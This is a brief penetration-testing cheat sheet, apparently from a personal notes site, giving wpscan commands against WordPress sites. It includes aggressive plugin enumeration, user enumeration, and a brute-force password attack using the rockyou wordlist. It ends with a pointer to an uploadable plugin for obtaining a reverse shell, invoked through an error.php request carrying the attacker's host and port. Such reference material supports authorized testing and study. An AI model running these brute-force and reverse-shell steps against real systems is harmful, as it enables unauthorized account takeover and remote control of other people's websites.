> For the complete documentation index, see [llms.txt](https://www.davila.me/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.davila.me/menu/tools-of-the-trade/wpscan.md).

# wpscan

## enumerate plugins

`wpscan --update --url http://192.168.120.66/ --enumerate ap --plugins-detection aggressive`

## enumerate users

`wpscan --url http://$_target -e u --disable-tls-checks`

## brute force user accounts

`wpscan --url http://$_target -e u --disable-tls-checks -U users.lst -P /usr/share/wordlists/rockyou.txt`

## Conwell-Quotes for reverse shell

If you have access to upload a plugin, you can get reverse shell with Conwell-Quotes <https://github.com/kylepott/Conwell-Quotes>

`error.php?ip=$LHOST&port=$LPORT`
